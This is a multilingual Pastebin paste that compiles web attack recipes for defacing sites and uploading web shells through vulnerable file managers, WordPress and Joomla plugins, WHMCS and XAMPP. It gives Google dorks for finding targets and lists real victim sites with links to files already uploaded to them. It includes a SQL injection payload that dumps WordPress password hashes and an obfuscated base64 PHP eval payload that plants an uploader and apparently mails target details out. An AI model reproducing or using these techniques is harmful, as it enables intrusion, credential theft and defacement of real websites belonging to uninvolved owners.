Kyfx

Exploits

May 15th, 2015
497
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.07 KB | None | 0 0
  1. /ajaxfilemanager file uploader deface on txt/jpg not sure about html/
  2.  
  3. Open Google Search Engine, Type this dork :inurl:/plugins/ajaxfilemanager/
  4. For Example I got :
  5. http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/ - See more at: http://mxdotmy.blogspot.kr/2013/04/ajax-file-manager-shell-and-files.html#sthash.xj3zu2j0.dpuf
  6.  
  7. or http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/
  8. or any site else ...
  9. Now Put ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url
  10.  
  11.  
  12. for example :
  13. http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
  14. http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
  15.  
  16. Now Find Upload Upload and Upload Your shell/Deface/file To view you File find /Uploaded/ directory in Website by using your brain :P example of uploaded file : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt
  17.  
  18. ------------------
  19. WordPress File Upload com Asset Manager
  20.  
  21. Dork:inurl:Editor/assetmanager/assetmanager.asp
  22.  
  23. --------------------
  24. Hack Blog/WordPress forma facil facil :D
  25.  
  26.  
  27. Dork: inurl:"fbconnect_action=myhome"
  28. 2. Agora, abra qualquer link abaixo.
  29. 3. Depois de abrir o link basta alterar essa parte da ?fbconnect_action=myhome&userid= com este aqui:
  30.  
  31. ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z​0mbyak,7,8,9,10,11,12+from+wp_users--
  32.  
  33. ----------------------
  34. Hack sites usando RTE webwiz Vulnerabilidade
  35.  
  36. Primeiro procure o Dork Dork para esta vulnerabilidade é "inurl:rte/my_documents/my_files"
  37. O Exploit é site.com/rte/RTE_popup_file_atch.asp
  38.  
  39. site.com/admin/RTE_popup_file_atch.asp
  40.  
  41. exemplo, eu encontrei um site que é vulnerável a RTE Site: http://www.billkonigsberg.com Vulnerabilidade http://www.billkonigsberg.com/RTE_popup_file_atch.asp Agora é so carregar a página deface no site, depois de carregar a sua página.
  42. Obs: Procure outra pagina pois está ja não está mais vulneravel
  43.  
  44. --------------------------
  45. EzFilemanager Deface Upload
  46.  
  47. Dork para EzFilemanager é "inurl:ezfilemanager/ezfilemanager.php"
  48. (Você pode modificar esse dork para obter mais resultados no google)
  49. Exploit: http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
  50. Ir para este URL: website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php e colocar ?sa=1&type=file depois da URL
  51. agora url será: http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
  52. Agora ver a opção de upload e você pode fazer o upload, html, pdf, ppt, txt, doc, rtf, xml, xsl, DTD, zip, rar, jpg, png
  53. ---------------------------
  54.  
  55. Title : Wordpress Exploit Easy Comment Upload
  56.  
  57. Dork : inurl:easy-comment-uploads/upload-form.php
  58.  
  59. POC : /wp-content/plugins/easy-comment-uploads/upload-form.php
  60.  
  61. 1. Pergi Google masukkan dork ke dalam Search dan Go.
  62.  
  63. Dork : inurl:easy-comment-uploads/upload-form.php
  64.  
  65. 2. Pilih target.
  66.  
  67. 3. Ada butang choose file tu tekan dan upload file anda.
  68.  
  69. 4. Tidak semua dapat support html/php/asp sebab bug ne sudah fix 12/09/2011.
  70.  
  71. 5. Dapat target untuk upload html kira bertuahlah.
  72.  
  73. Untuk lihat hasil file upload anda tambah /wp-content/uploads/2011/10/nama_file_anda.extension
  74. ---------------------------------
  75. JOOMLA COMPONENT COM_SMARTFORMER SHELL UPLOAD VULNERABILITY
  76.  
  77. Assalamualaikum hari ini aku nak share exploit joomla lagi.Exploit ini korang bole upload shell.Ok jom mula.
  78.  
  79. 1. Google dork :
  80. inurl:"index.php?option=com_smartformer"
  81.  
  82. 2. Pilih salah satu target dah akan keluar contoh mcm dalam gambar di bawah :
  83.  
  84.  
  85. Isi maklumat macam dalam gambar.
  86. Lepas tu SUBMIT.
  87.  
  88. Akan keluar lebih kurang macam gambar di bawah :
  89.  
  90.  
  91. Ok kalau keluar mcm ni mksudnya shell korang dah masuk.Tapi kalau tak keluar macam ni contoh nya dia tulis "File rejected","file contain virus", dll maksudnya korang tak boleh upload shell.
  92.  
  93. 3. Untuk tengok hasil :
  94. http://target.com/components/com_smartformer/files/SHELL.php
  95.  
  96. target.com = ganti dengan url website yg korang dapat SHELL.php tu ganti dengan nama shell korang.
  97.  
  98. note : ada website yang bole upload tapi bila buka shell tulis not found.tu maksudnya website tu simpan shell tu di directory lain.korang kena cari explore seniri.
  99.  
  100. SIAP!
  101.  
  102. Live Demo :
  103. http://www.northendthrift.com/index.php?option=com_smartformer&Itemid=3
  104.  
  105. Result :
  106. http://www.northendthrift.com/components/com_smartformer/files/hello.htm
  107.  
  108. -------------------------------------------
  109. WordPress "photocrati-theme" Remote File Upload "RFU"
  110.  
  111.  
  112. As-salam salam sejahteranye pun aduii... ok hari ni ku nak ajar exploit wordpress sangat simple upload shell dah terus boleh hack ok jom mulakannya pun aduiii... Dork nya
  113.  
  114.  
  115.  
  116. "inurl:wp-content/themes/photocrati-theme/admin" ok kembang2 kan la dork nya yach << indon -_- ok seterusnya korang akan jumpa website macam ini http://www.photosbykendel.com/wp-content/themes/photocrati-theme/admin/gallery/gallery-iframe.php?gal_id=65_1&gal_type=1&gal_cap=OFF&gal_page=true&page_template=false&bg=42413F seterusnya korang cuma perlu ganti dengan upload_edit.php contohnya macam ini http://www.photosbykendel.com/wp-content/themes/photocrati-theme/admin/gallery/upload_edit.php maka akan terpapar tempat nak upload shell macam nie
  117.  
  118.  
  119. ok lepas 2 korang bolehlah upload shell berbentuk shell.php.jpg
  120.  
  121.  
  122. ramai tnya mana nak dapat shell.php.jpg ?? korang cuma perlu rename nama shell korang saje jadi shell.php.jpg
  123.  
  124. dah korang upload tekan menekan add images
  125.  
  126. ok dah selesai upload shell korang akan kuar di sini
  127.  
  128. http://www.photosbykendel.com/wp-content/themes/photocrati-theme/galleries/post-/full/shell.php.jpg
  129.  
  130. contoh shell yang aku dah upload
  131.  
  132. http://www.photosbykendel.com/wp-content/themes/photocrati-theme/galleries/post-/full/taik.php.jpg
  133.  
  134. ------------------------------
  135. Hack with WHM Submit ticket exploit
  136.  
  137. Upload Script
  138.  
  139. {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OE{php}eval(base64_decode('wyWnZjbTAgSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSSBQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSSBWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JIFBHSnlQaWM3SUgwTkNuME5DajggIik7ICR2ID0gYmFzZTY0X2RlY29kZSgiSkhZZ1BTQWtTRlJVVUY5RFQwOUxTVVZmVmtGU1Uxc2lkbWx6YVhSeklsMDdEUW9nYVdZb0lDUjJJRDA5SUNJaUtRMEtJSHNrZGlBOUlEQTdEUW9nSkhacGMybDBiM0lnUFNBa1gxTkZVbFpGVWxzaVVrVk5UMVJGWDBGRVJGSWlYVHNOQ2lBa2QyVmlJRDBnSkY5VFJWSldSVkpiSWtoVVZGQmZTRTlUVkNKZE93MEtJQ1JwYm1vZ1BTQWtYMU5GVWxaRlVsc2lVa1ZSVlVWVFZGOVZVa2tpWFRzTkNpQWtkR0Z5WjJWMElEMGdjbUYzZFhKc1pHVmpiMlJsS0NSM1pXSXVKR2x1YWlrN0RRb2dKR0p2WkhrZ1BTQWlVMmhsYkd3Z1YyaHRZM01nUkdrZ09pQWtkR0Z5WjJWMElHbHdJQ1IyYVhOcGRHOXlJanNnUUcxaGFXd29JbmRoYkdGb01UVTVRR2R0WVdsc0xtTnZiU0lzSWlBa2RHRnlaMlYwSWl3Z0lpUmliMlI1SWlrN0RRb2dmU0JsYkhObElIc05DaUFrZGpzTkNpQjlJSE5sZEdOdmIydHBaU2dpZG1semFYUnpJaXdrZGlrNyIpOyAkZm8gPSBmb3BlbigidGVtcGxhdGVzL3gucGhwIiwidyIpOyBmd3JpdGUoJGZvLCRjb2RlLCR2KTs=')) ;{/php}) <---- copy paste on description,title and also name for the email is your choice if paste doesnt work use fake or your alt email
  140.  
  141.  
  142.  
  143.  
  144.  
  145. Dork
  146.  
  147. 1. inurl:whmcs/cart.php?a=
  148. 2. inurl:billing/cart.php?a=
  149.  
  150. intext:Powered by WHMCompleteSolution inurl:submitticket.php
  151. intext:Powered by WHMCompleteSolution inurl:clients/submitticket.php
  152. intext:Powered by WHMCompleteSolution inurl:client/submitticket.php
  153. intext:Powered by WHMCompleteSolution inurl:clientsarea/submitticket.php
  154. intext:Powered by WHMCompleteSolution inurl:clientarea/submitticket.php
  155. intext:Powered by WHMCompleteSolution inurl:crm/submitticket.php
  156. intext:Powered by WHMCompleteSolution inurl:cp/submitticket.php
  157. intext:Powered by WHMCompleteSolution inurl:manage/submitticket.php
  158. intext:Powered by WHMCompleteSolution inurl:member/submitticket.php
  159. intext:Powered by WHMCompleteSolution inurl:members/submitticket.php
  160. intext:Powered by WHMCompleteSolution inurl:billing/submitticket.php
  161. intext:Powered by WHMCompleteSolution inurl:billings/submitticket.php
  162. intext:Powered by WHMCompleteSolution inurl:support/submitticket.php
  163. intext:Powered by WHMCompleteSolution inurl:help/submitticket.php
  164. intext:Powered by WHMCompleteSolution inurl:secure/submitticket.php
  165. intext:Powered by WHMCompleteSolution inurl:store/submitticket.php
  166. intext:Powered by WHMCompleteSolution inurl:whmcs/submitticket.php
  167. intext:Powered by WHMCompleteSolution inurl:log/submitticket.php
  168. intext:Powered by WHMCompleteSolution inurl:myaccount/submitticket.php
  169. intext:Powered by WHMCompleteSolution inurl:orders/submitticket.php
  170. intext:Powered by WHMCompleteSolution inurl:order/submitticket.php
  171. intext:Powered by WHMCompleteSolution inurl:portal/submitticket.php
  172. intext:Powered by WHMCompleteSolution inurl:mc/submitticket.php
  173. intext:Powered by WHMCompleteSolution inurl:office/submitticket.php
  174. intext:Powered by WHMCompleteSolution inurl:submitticket.php site:com
  175. intext:Powered by WHMCompleteSolution inurl:submitticket.php site:org
  176. intext:Powered by WHMCompleteSolution inurl:submitticket.php site:net
  177. intext:Powered by WHMCompleteSolution inurl:submitticket.php site:info
  178. intext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php"
  179. intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"
  180.  
  181. ------------------------------------------------
  182. Deface Website Dengan Spaw File Manager
  183.  
  184.  
  185. SPAW FILE MANAGER - FILE UPLOAD VULNERABILITY
  186.  
  187.  
  188. Jom Start!!
  189.  
  190. 1. Masukkan salah satu Dork ini di Google search
  191.  
  192.  
  193. = inurl:Spaw2/dialogs/
  194. = Inurl:spaw2/uploads/files \
  195. = Index of:/Spaw2/uploads/files
  196.  
  197. 2.Pilih satu website dan masukan exploit dihujung URL... dan tekan enter.
  198.  
  199.  
  200. Exploit :/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=
  201.  
  202. site/anydork/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=
  203.  
  204. ----------------------------------------
  205.  
  206. xploit WordPress “/easy-comment-uploads/upload-form.php”
  207.  
  208.  
  209. —————————————————————————-
  210. | Title : WordPress Plugin EasyComment Upload Vulnerability
  211. | Author: Z190T
  212. | Vendor: http://wordpress.org/extend/plugins/easy-comment-uploads/
  213. | Date : 15/06/2011
  214. | Dork : “/easy-comment-uploads/upload-form.php”
  215. | Category : PHP [File Upload Vulnerability]
  216. | Tested on: [Windows XP3, Linux Ubuntu]
  217. —————————————————————————-
  218.  
  219.  
  220.  
  221. *_Exploit_*
  222. # http://[localhost]/[path]/easy-comment-uploads/upload-form.php
  223. # http://[localhost]/easy-comment-uploads/upload-form.php
  224. # File Extention [.txt],[.jpg],[gif],[png],[bmp]
  225. *_Preview_*
  226. # site/wp-content/uploads/[years]/[month]/[yourshell]
  227. # ex: site/wp-content/uploads/2011/06/shell.php;.txt
  228. =========================================================
  229. Demo langsung :
  230.  
  231.  
  232.  
  233. http://www.conversationworks.ca/wp-content/uploads/2011/06/galau.jpg
  234. http://www.qastairs.com/wp/wp-content/uploads/2011/06/galau.jpg
  235. http://www.10000mile.com/main/wp-content/uploads/2011/06/galau.jpg
  236. -----------------------------------------------------------
  237. "Encodable" ~ another Deface and shell upload Vulnerablity
  238.  
  239.  
  240. Title : "Encodable" ~ another File upload Vulnerablity
  241. Google Dork : "intext:File Upload by Encodable"
  242.  
  243. Lets Start .. xd
  244. open google.com and enter this dork : "intext:File Upload by Encodable"
  245.  
  246.  
  247. result comes with 166,000 results but some results are fake ... its may be malwaers
  248. so pick real things only , "Upload a file" You will this title in search results here :)
  249. click the sites sites only which comes with upload a file title
  250. after click the link you'll got a upload form
  251. you'll saw some options in this form like name Description email etc ...
  252. type anything in these boxes but add a email in email box, dont use your own
  253. put this one billy@microsoft.com , admin@nasa.gov etc :P
  254.  
  255. now choose you file and upload it :)
  256.  
  257. after clicking on upload button a pop up will be open ... dont close it, it will automatilcly closed
  258. after uploading file
  259.  
  260. in some sites you'll got you uploaded file link after uploading on website
  261. and if you did not file it then try these url
  262. /upload/files/
  263. or /upload/userfiles/
  264.  
  265. Live Demo : http://150.101.230.65:8008/cgi-bin/filechucker.plx
  266. Uploaded page : http://150.101.230.65:8008/upload/files/xd.html
  267. ---------------------------------------------------------------------------
  268. Uploading defaces pages JOOMLA
  269. http://mxdotmy.blogspot.kr/2013/04/cara-deface-dengan-teknik-exploit-joomla.html
  270.  
  271. Thanks Indonesia Cyber Army lovaya
  272.  
  273. ---------------------------------------------------------------------------
  274. As-salam korang semua harap2 baik2 saja dah lama x update blog nie ok hari ni ku nak ajar korang cara hack website dengan method CSRF ? apa 2 CSRF?? CSRF ialah cross site scripting haha betul x aku xtau ok jom mula :D dork : inurl:/plugins/simple-forum/
  275.  
  276. /resources/jscript/ajaxupload/sf-uploader.php
  277.  
  278. kt belakang contoh akan jadi cmni
  279.  
  280. www.site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php
  281.  
  282. dia akan kuar tulisan = error
  283.  
  284. kalau kuar acces denied x boleh la 2
  285.  
  286. poc dia
  287.  
  288.  
  289.  
  290.  
  291. <form enctype="multipart/form-data" action="http://mamaklub.longtail.sk/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php" method="post"> <input type="jpg" name="url" value="./" /><br /> Please choose a file: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> upload poc dia dalam mana web save as.html lepas 2 tukar website yang ada tulisan error masuk kan dalam poc 2 bila bukak akan kuar form upload dan upload la shell shell korang akan kuar kt sini wp-content/plugins/simple-forum/resources/jscript/ajaxupload/namashell.php
  292.  
  293.  
  294. ----------------------
  295.  
  296. Wp mini forum defaces and shells uploads
  297.  
  298. inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload
  299.  
  300. site.com/wp-content/uploads/tdomf/tmp/1/ip address korang/shell.php.jpg
  301. --------------------------------
  302.  
  303. Asset Manager :Shell and Files upload Vulnerability
  304.  
  305. Google Dork : "inurl:Editor/assetmanager/assetmanager.asp"
  306.  
  307. Open Google.com/ncr and enetr this dork
  308.  
  309. "inurl:Editor/assetmanager/assetmanager.asp"
  310.  
  311. Now Open any site from search results
  312.  
  313.  
  314. Upload File:
  315.  
  316. and site url will be like site.com/Editor/assetmanager/assetmanager.asp
  317.  
  318. Change The Flash into all Files and Now choose Your File and Upload
  319.  
  320. and acess Your file here site.com/Editor/assets/yourfilehere
  321. -------------------------
  322. Xampp/lang.tmp Exploit
  323.  
  324. inurl:"xampp/lang.tmp"
  325.  
  326. /xampp/lang.tmp change to /xampp/lang.php?MESSAGE HERE
Add Comment
Please, Sign In to add comment